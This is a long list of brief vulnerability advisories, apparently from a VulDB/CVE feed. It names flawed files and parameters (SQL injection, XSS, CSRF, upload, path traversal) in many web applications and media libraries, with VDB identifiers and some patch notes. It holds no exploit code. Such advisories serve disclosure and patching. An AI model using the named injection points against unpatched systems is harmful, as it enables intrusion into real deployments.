A vulnerability classified as problematic has been found in CTF-hacker pwn. This affects an unknown part of the file delete.html. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-215109 was assigned to this vulnerability.
A vulnerability was found in y_project RuoYi-Cloud. It has been rated as problematic. Affected by this issue is some unknown functionality of the component JSON Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215108.
A vulnerability was found in xiandafu beetl-bbs. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file WebUtils.java. The manipulation of the argument user leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215107.
A vulnerability has been found in csliuwy coder-chain_gdut and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /back/index.php/user/User/?1. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215095.
Libde265 v1.0.8 was discovered to contain an unknown crash via ff_hevc_put_hevc_qpel_v_3_8_sse in sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted video file.
Libde265 v1.0.8 was discovered to contain an unknown crash via ff_hevc_put_hevc_qpel_h_3_v_3_sse in sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted video file.
A vulnerability was found in FastCMS. It has been rated as critical. This issue affects some unknown processing of the file /template/edit of the component Template Handler. The manipulation leads to injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214901 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in TP-Link TL-WR740N. Affected is an unknown function of the component ARP Handler. The manipulation leads to resource consumption. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214812.
A vulnerability was found in SpringBootCMS and classified as critical. Affected by this issue is some unknown functionality of the component Template Management. The manipulation leads to injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214790 is the identifier assigned to this vulnerability.
A vulnerability has been found in Facepay 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /face-recognition-php/facepay-master/camera.php. The manipulation of the argument userId leads to authorization bypass. The attack can be launched remotely. The identifier VDB-214789 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Dot Tech Smart Campus System. Affected by this issue is some unknown functionality of the file /services/Card/findUser. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214778 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Human Resource Management System 1.0. Affected is an unknown function of the file /hrm/employeeview.php. The manipulation of the argument search leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214776.
A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /hrm/employeeadd.php. The manipulation of the argument empid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214775.
A vulnerability was found in Shaoxing Background Management System. It has been declared as critical. This vulnerability affects unknown code of the file /Default/Bd. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-214774 is the identifier assigned to this vulnerability.
A vulnerability was found in House Rental System and classified as critical. Affected by this issue is some unknown functionality of the file tenant-engine.php of the component POST Request Handler. The manipulation of the argument id_photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214772.
A vulnerability has been found in House Rental System and classified as critical. Affected by this vulnerability is an unknown functionality of the file search-property.php of the component POST Request Handler. The manipulation of the argument search_property leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214771.
A vulnerability, which was classified as critical, was found in House Rental System. Affected is an unknown function of the file /view-property.php. The manipulation of the argument property_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214770 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Human Resource Management System 1.0. This issue affects some unknown processing of the file /hrm/controller/employee.php of the component Content-Type Handler. The manipulation of the argument pfimg leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214769 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in FeMiner wms. Affected by this issue is some unknown functionality of the file /product/savenewproduct.php?flag=1. The manipulation of the argument upfile leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214760.
A vulnerability was found in C-DATA Web Management System. It has been rated as critical. This issue affects some unknown processing of the file cgi-bin/jumpto.php of the component GET Parameter Handler. The manipulation of the argument hostname leads to argument injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214631.
A vulnerability was found in Movie Ticket Booking System and classified as problematic. Affected by this issue is some unknown functionality of the file editBooking.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214628.
A vulnerability has been found in Movie Ticket Booking System and classified as problematic. Affected by this vulnerability is an unknown functionality of the file booking.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214627.
A vulnerability, which was classified as problematic, was found in Movie Ticket Booking System. Affected is an unknown function of the component POST Request Handler. The manipulation of the argument ORDER_ID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214626 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Movie Ticket Booking System. This issue affects some unknown processing of the file editBooking.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214625 was assigned to this vulnerability.
A vulnerability classified as critical was found in Movie Ticket Booking System. This vulnerability affects unknown code of the file booking.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214624.
A vulnerability classified as problematic has been found in Kakao PotPlayer. This affects an unknown part of the component MID File Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214623.
A vulnerability has been found in SourceCodester Event Registration System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /event/admin/?page=user/list. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-214591.
A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. Affected is an unknown function. The manipulation of the argument cmd leads to unrestricted upload. It is possible to launch the attack remotely. VDB-214590 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Tribal Systems Zenario CMS 9.3.57595. This issue affects some unknown processing of the component Remember Me Handler. The manipulation leads to session fixiation. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214589 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Book Store Management System 1.0. This vulnerability affects unknown code of the file /bsms_ci/index.php. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214588.
A vulnerability classified as problematic has been found in SourceCodester Book Store Management System 1.0. This affects an unknown part of the file /bsms_ci/index.php/user/edit_user/. The manipulation of the argument password leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214587.
In freeradius, when an EAP-SIM supplicant sends an unknown SIM option, the server will try to look that option up in the internal dictionaries. This lookup will fail, but the SIM code will not check for that failure. Instead, it will dereference a NULL pointer, and cause the server to crash.
A vulnerability was found in rickxy Stock Management System and classified as problematic. This issue affects some unknown processing of the file us_transac.php?action=add. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214331.
A vulnerability was found in rickxy Stock Management System. It has been declared as problematic. This vulnerability affects unknown code of the file /pages/processlogin.php. The manipulation of the argument user leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214324.
A vulnerability was found in rickxy Stock Management System and classified as critical. Affected by this issue is some unknown functionality of the file /pages/processlogin.php. The manipulation of the argument user/password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214322 is the identifier assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** An Improper Restriction of XML External Entity Reference vulnerability in RPCRouterServlet of Apache SOAP allows an attacker to read arbitrary files over HTTP. This issue affects Apache SOAP version 2.2 and later versions. It is unknown whether previous versions are also affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability was found in Student Attendance Management System. It has been classified as problematic. Affected is an unknown function of the file createClass.php. The manipulation of the argument className leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-213846 is the identifier assigned to this vulnerability.
A vulnerability was found in Student Attendance Management System and classified as critical. This issue affects some unknown processing of the file /Admin/createClass.php. The manipulation of the argument Id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213845 was assigned to this vulnerability.
A vulnerability has been found in Hostel Searching Project and classified as critical. This vulnerability affects unknown code of the file view-property.php. The manipulation of the argument property_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213844.
A vulnerability, which was classified as critical, was found in Sports Club Management System 119. This affects an unknown part of the file admin/make_payments.php. The manipulation of the argument m_id/plan leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213789 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in FeehiCMS. Affected by this issue is some unknown functionality of the component Post My Comment Tab. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The identifier of this vulnerability is VDB-213788.
A vulnerability classified as problematic was found in Hospital Management Center. Affected by this vulnerability is an unknown functionality of the file appointment.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213787.
A vulnerability classified as critical has been found in Hospital Management Center. Affected is an unknown function of the file patient-info.php. The manipulation of the argument pt_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-213786 is the identifier assigned to this vulnerability.
A vulnerability was found in Simple History Plugin. It has been rated as critical. This issue affects some unknown processing of the component Header Handler. The manipulation of the argument X-Forwarded-For leads to improper output neutralization for logs. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213785 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in MonikaBrzica scm. This affects an unknown part of the file uredi_korisnika.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213699.
A vulnerability, which was classified as critical, has been found in MonikaBrzica scm. Affected by this issue is some unknown functionality of the file upis_u_bazu.php. The manipulation of the argument email/lozinka/ime/id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-213698 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Sanitization Management System. Affected by this vulnerability is an unknown functionality of the file admin/?page=system_info of the component Banner Image Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-213571.
A vulnerability was found in Frappe. It has been rated as problematic. Affected by this issue is some unknown functionality of the file frappe/templates/includes/navbar/navbar_search.html of the component Search. The manipulation of the argument q leads to cross site scripting. The attack may be launched remotely. The name of the patch is bfab7191543961c6cb77fe267063877c31b616ce. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-213560.
A vulnerability, which was classified as problematic, was found in NodeBB up to 2.5.7. This affects an unknown part of the file /register/abort. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 2.5.8 is able to address this issue. The name of the patch is 2f9d8c350e54543f608d3d4c8e1a49bbb6cdea38. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-213555.
A vulnerability has been found in MZ Automation libiec61850 up to 1.4 and classified as critical. This vulnerability affects unknown code of the file src/mms/iso_mms/client/mms_client_files.c of the component MMS File Services. The manipulation of the argument filename leads to path traversal. Upgrading to version 1.5 is able to address this issue. The name of the patch is 10622ba36bb3910c151348f1569f039ecdd8786f. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-213556.
A vulnerability classified as critical has been found in Pingkon HMS-PHP. Affected is an unknown function of the file /admin/admin.php of the component Data Pump Metadata. The manipulation of the argument uname/pass leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213552.
A vulnerability was found in Pingkon HMS-PHP. It has been rated as critical. This issue affects some unknown processing of the file admin/adminlogin.php. The manipulation of the argument uname/pass leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213551.
A vulnerability was found in matrix-appservice-irc up to 0.35.1. It has been declared as critical. This vulnerability affects unknown code of the file src/datastore/postgres/PgDataStore.ts. The manipulation of the argument roomIds leads to sql injection. Upgrading to version 0.36.0 is able to address this issue. The name of the patch is 179313a37f06b298150edba3e2b0e5a73c1415e7. It is recommended to upgrade the affected component. VDB-213550 is the identifier assigned to this vulnerability.
A vulnerability has been found in emlog and classified as problematic. Affected by this vulnerability is an unknown functionality of the file admin/article_save.php. The manipulation of the argument tag leads to cross site scripting. The attack can be launched remotely. The name of the patch is 5bf7a79826e0ea09bcc8a21f69a0c74107761a02. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-213547.
A vulnerability, which was classified as critical, was found in Vesta Control Panel. Affected is an unknown function of the file func/main.sh of the component sed Handler. The manipulation leads to argument injection. An attack has to be approached locally. The name of the patch is 39561c32c12cabe563de48cc96eccb9e2c655e25. It is recommended to apply a patch to fix this issue. VDB-213546 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in ffmpeg. This affects an unknown part of the file libavcodec/rpzaenc.c of the component QuickTime RPZA Video Encoder. The manipulation of the argument y_size leads to out-of-bounds read. It is possible to initiate the attack remotely. The name of the patch is 92f9b28ed84a77138105475beba16c146bdaf984. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-213543.
A vulnerability was found in gnuboard5. It has been classified as problematic. Affected is an unknown function of the file bbs/faq.php of the component FAQ Key ID Handler. The manipulation of the argument fm_id leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 5.5.8.2.1 is able to address this issue. The name of the patch is ba062ca5b62809106d5a2f7df942ffcb44ecb5a9. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-213540.
A vulnerability, which was classified as problematic, has been found in drogon up to 1.8.1. Affected by this issue is some unknown functionality of the component Session Hash Handler. The manipulation leads to small space of random values. The attack may be launched remotely. Upgrading to version 1.8.2 is able to address this issue. The name of the patch is c0d48da99f66aaada17bcd28b07741cac8697647. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-213464.
A vulnerability classified as critical has been found in tsruban HHIMS 2.1. Affected is an unknown function of the component Patient Portrait Handler. The manipulation of the argument PID leads to sql injection. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. VDB-213462 is the identifier assigned to this vulnerability.
A vulnerability was found in tholum crm42. It has been rated as critical. This issue affects some unknown processing of the file crm42\class\class.user.php of the component Login. The manipulation of the argument user_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213461 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Sourcecodester Simple Cashiering System. This issue affects some unknown processing of the component User Account Handler. The manipulation of the argument fullname leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-213455.
A vulnerability classified as critical was found in eolinker goku_lite. This vulnerability affects unknown code of the file /plugin/getList. The manipulation of the argument route/keyword leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-213454 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in eolinker goku_lite. This affects an unknown part of the file /balance/service/list. The manipulation of the argument route/keyword leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213453 was assigned to this vulnerability.
A vulnerability was found in ForU CMS. It has been classified as problematic. Affected is an unknown function of the file cms_chip.php. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-213450 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Sanitization Management System and classified as problematic. This issue affects some unknown processing of the file php-sms/?p=request_quote. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-213449 was assigned to this vulnerability.
A vulnerability has been found in Activity Log Plugin and classified as critical. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument X-Forwarded-For leads to improper output neutralization for logs. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213448.
A vulnerability, which was classified as problematic, was found in lanyulei ferry. This affects an unknown part of the file apis/process/task.go. The manipulation of the argument file_name leads to path traversal. The associated identifier of this vulnerability is VDB-213447.
A vulnerability, which was classified as critical, has been found in lanyulei ferry. Affected by this issue is some unknown functionality of the file apis/public/file.go of the component API. The manipulation of the argument file leads to path traversal. The attack may be launched remotely. VDB-213446 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Maxon ERP. This affects an unknown part of the file /index.php/purchase_order/browse_data. The manipulation of the argument tb_search leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213039.
A vulnerability, which was classified as problematic, was found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. Affected is an unknown function of the component URL Field Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. VDB-216246 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. This issue affects some unknown processing of the file /api/browserextension/UpdatePassword/ of the component API. The manipulation of the argument PasswordID leads to authorization bypass. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-216245 was assigned to this vulnerability.
A vulnerability classified as critical was found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. This vulnerability affects unknown code of the component API. The manipulation leads to authentication bypass by assumed-immutable data. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216244.
A vulnerability classified as critical has been found in SourceCodester Sanitization Management System. Affected is an unknown function of the file /php-sms/classes/Master.php?f=save_quote. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213012.
A vulnerability has been found in phpipam and classified as problematic. Affected by this vulnerability is an unknown functionality of the file app/admin/import-export/import-load-data.php of the component Import Preview Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.5.0 is able to address this issue. The name of the patch is 22c797c3583001211fe7d31bccd3f1d4aeeb3bbc. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-212863.
A vulnerability, which was classified as problematic, was found in Webmin 2.001. Affected is an unknown function of the file xterm/index.cgi. The manipulation leads to basic cross site scripting. It is possible to launch the attack remotely. Upgrading to version 2.003 is able to address this issue. The patch is identified as d3d33af3c0c3fd3a889c84e287a038b7a457d811. It is recommended to upgrade the affected component. VDB-212862 is the identifier assigned to this vulnerability.
A vulnerability was found in centreon. It has been declared as critical. This vulnerability affects unknown code of the file formContactGroup.php of the component Contact Groups Form. The manipulation of the argument cg_id leads to sql injection. The attack can be initiated remotely. The name of the patch is 293b10628f7d9f83c6c82c78cf637cbe9b907369. It is recommended to apply a patch to fix this issue. VDB-212794 is the identifier assigned to this vulnerability.
A vulnerability was found in Huaxia ERP. It has been classified as problematic. This affects an unknown part of the file /depotHead/list of the component Retail Management. The manipulation of the argument search leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212793 was assigned to this vulnerability.
A vulnerability was found in Huaxia ERP 2.3 and classified as critical. Affected by this issue is some unknown functionality of the component User Management. The manipulation of the argument login leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212792.
A vulnerability has been found in Axiomatic Bento4 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component mp4mux. The manipulation leads to memory leak. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212683.
A vulnerability, which was classified as problematic, was found in Axiomatic Bento4. Affected is an unknown function of the component mp4decrypt. The manipulation leads to memory leak. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-212682 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Axiomatic Bento4. This issue affects some unknown processing of the component mp4decrypt. The manipulation leads to memory leak. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212681 was assigned to this vulnerability.
A vulnerability classified as problematic was found in Axiomatic Bento4. This vulnerability affects unknown code of the component mp4decrypt. The manipulation leads to memory leak. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212680.
A vulnerability classified as problematic has been found in Axiomatic Bento4. This affects an unknown part of the component mp4edit. The manipulation leads to memory leak. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212679.
A vulnerability was found in Axiomatic Bento4. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Incomplete Fix CVE-2019-13238. The manipulation leads to resource consumption. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212660.
A vulnerability was found in eolinker apinto-dashboard. It has been classified as problematic. Affected is an unknown function of the file /login. The manipulation of the argument callback leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212640.
A vulnerability was found in eolinker apinto-dashboard and classified as problematic. This issue affects some unknown processing of the file /api/discoveries/. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212639.
A vulnerability has been found in IBAX go-ibax and classified as critical. This vulnerability affects unknown code of the file /api/v2/open/rowsInfo. The manipulation of the argument where leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212638 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in IBAX go-ibax. This affects an unknown part of the file /api/v2/open/rowsInfo. The manipulation of the argument order leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212637 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in IBAX go-ibax. Affected by this issue is some unknown functionality of the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212636.
A vulnerability classified as critical was found in IBAX go-ibax. Affected by this vulnerability is an unknown functionality of the file /api/v2/open/tablesInfo. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212635.
A vulnerability classified as critical has been found in IBAX go-ibax. Affected is an unknown function of the file /api/v2/open/tablesInfo. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-212634 is the identifier assigned to this vulnerability.
A vulnerability was found in eolinker apinto-dashboard. It has been rated as problematic. This issue affects some unknown processing of the file /login. The manipulation of the argument callback leads to open redirect. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212633 was assigned to this vulnerability.
A vulnerability has been found in Tim Campus Confession Wall and classified as critical. Affected by this vulnerability is an unknown functionality of the file share.php. The manipulation of the argument post_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212611.
A vulnerability, which was classified as problematic, has been found in node-red-dashboard. This issue affects some unknown processing of the file components/ui-component/ui-component-ctrl.js of the component ui_text Format Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 9305d1a82f19b235dfad24a7d1dd4ed244db7743. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212555.
A vulnerability was found in SourceCodester Train Scheduler App 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /train_scheduler_app/?action=delete. The manipulation of the argument id leads to improper control of resource identifiers. The attack may be launched remotely. The identifier of this vulnerability is VDB-212504.
A vulnerability classified as critical was found in Yunjing CMS. This vulnerability affects unknown code of the file /index/user/upload_img.html. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212500.
A vulnerability was found in seccome Ehoney. It has been rated as critical. This issue affects some unknown processing of the file /api/public/signup. The manipulation leads to improper access controls. The identifier VDB-212417 was assigned to this vulnerability.
** DISPUTED ** A vulnerability was found in a port or fork of Redis. It has been declared as critical. This vulnerability affects unknown code in the library C:/Program Files/Redis/dbghelp.dll. The manipulation leads to uncontrolled search path. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier of this vulnerability is VDB-212416. NOTE: The official Redis release is not affected. This issue might affect an unofficial fork or port on Windows only.
A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. This affects an unknown part of the file Admin/edit-admin.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212415.
A vulnerability was found in seccome Ehoney and classified as critical. Affected by this issue is some unknown functionality of the file /api/v1/bait/set. The manipulation of the argument Payload leads to sql injection. The attack may be launched remotely. VDB-212414 is the identifier assigned to this vulnerability.
A vulnerability has been found in seccome Ehoney and classified as critical. Affected by this vulnerability is an unknown functionality of the file /api/v1/attack/token. The manipulation of the argument Payload leads to sql injection. The attack can be launched remotely. The identifier VDB-212413 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in seccome Ehoney. Affected is an unknown function of the file /api/v1/attack/falco. The manipulation of the argument Payload leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-212412.
A vulnerability, which was classified as critical, has been found in seccome Ehoney. This issue affects some unknown processing of the file /api/v1/attack. The manipulation of the argument AttackIP leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-212411.
A vulnerability classified as problematic was found in SourceCodester Online Medicine Ordering System 1.0. Affected by this vulnerability is an unknown functionality of the file /omos/admin/?page=user/list. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-212347.
A vulnerability classified as critical has been found in SourceCodester Online Medicine Ordering System 1.0. Affected is an unknown function of the file admin/?page=orders/view_order. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. VDB-212346 is the identifier assigned to this vulnerability.
** DISPUTED ** A vulnerability classified as problematic has been found in Ruby on Rails. This affects an unknown part of the file actionpack/lib/action_dispatch/middleware/templates/routes/_table.html.erb. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The real existence of this vulnerability is still doubted at the moment. The name of the patch is be177e4566747b73ff63fd5f529fab564e475ed4. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212319. NOTE: Maintainer declares that there isn&amp;#8217;t a valid attack vector. The issue was wrongly reported as a security vulnerability by a non-member of the Rails team.
A vulnerability has been found in SourceCodester Sanitization Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to missing authentication. The attack can be launched remotely. The identifier VDB-212017 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the file /php-sms/classes/Master.php. The manipulation of the argument message leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-212016.
A vulnerability, which was classified as problematic, has been found in SourceCodester Sanitization Management System 1.0. This issue affects some unknown processing of the file /php-sms/classes/SystemSettings.php. The manipulation of the argument name/shortname leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-212015.
A vulnerability classified as critical was found in SourceCodester eLearning System 1.0. This vulnerability affects unknown code of the file /admin/students/manage.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212014 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in Axiomatic Bento4. Affected by this vulnerability is an unknown functionality of the file AvcInfo.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212005 was assigned to this vulnerability.
A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects some unknown processing of the file fs/fscache/cookie.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211931.
A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component My Account. The manipulation of the argument First Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211201 was assigned to this vulnerability.
